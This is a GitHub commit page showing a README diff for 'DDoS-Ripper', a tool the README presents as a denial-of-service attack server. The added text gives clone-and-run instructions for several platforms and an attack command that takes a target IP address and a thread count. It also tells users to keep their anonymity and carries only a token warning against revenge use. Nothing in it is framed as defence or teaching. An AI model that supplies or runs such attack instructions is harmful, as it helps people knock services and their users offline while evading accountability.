Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
palahsu authored Nov 10, 2020
1 parent 5b60348 commit 7f4a64e
Showing 1 changed file with 42 additions and 6 deletions.
48 changes: 42 additions & 6 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,19 +6,55 @@ A Distributable Denied-of-Service (DDOS) attack server that cuts off targets or
DDoS attacks achieve effectiveness using multiple compromised computer systems as a source of attack traffic. Search engines may include computers and other network resources such as IoT devices.
From a higher level, the DDOS attack is like an unexpected traffic jam stuck on a highway, preventing regular traffic from reaching its destination.

`$ git clone https://github.com/palahsu/DDoS-Ripper`
## NOTE (Please, make sure you have installed python 3 )

`$ cd DDoS-Ripper`
![dddd](https://user-images.githubusercontent.com/49250151/96265488-57e53d00-0f7a-11eb-8936-ce2e9a2c42cd.PNG)

## For Termux
To use the DRipper type the following commands in Termux:

`pkg install git -y`

`pkg install python -y`

`pkg install python2 -y` (if python2 not working)

`pkg install python3 -y` (command python3)

`git clone https://github.com/palahsu/DDoS-Ripper.git`

`cd DDoS-Ripper`
`$ ls`

`$ python3 DRipper.py` OR `python DRipper.py`
`$ python3 DRipper.py` OR `python2 DRipper.py`

`$ python3 DRipper.py -s [ip Address] -t 135`
## For Debian-based GNU/Linux distributions
To use the application, type in the following commands in GNU/Linux terminal.

`$ example: python3 DRipper.py -s 0.00.00.00 -t 135`
`sudo apt install git`
`git clone https://github.com/palahsu/DDoS-Ripper.git`
`cd DDoS-Ripper`
`$ ls`
`$ python3 DRipper.py` OR `python2 DRipper.py`

![dddd](https://user-images.githubusercontent.com/49250151/96265488-57e53d00-0f7a-11eb-8936-ce2e9a2c42cd.PNG)

## For Windows

`git clone https://github.com/palahsu/DDoS-Ripper`

`cd DDoS-Ripper`

` ls`

`python3 DRipper.py` OR `python DRipper.py`

`python3 DRipper.py -s [ip Address] -t 135`

`example: python3 DRipper.py -s 0.00.00.00 -t 135`

## For MacOS

Install Brew and Install dependencies (python 3)

# Note:
If you find any problems than please write on issue github and to our Telegram Group. Don't use for revenge! Make sure your anonymity!
Expand Down

0 comments on commit 7f4a64e

Please sign in to comment.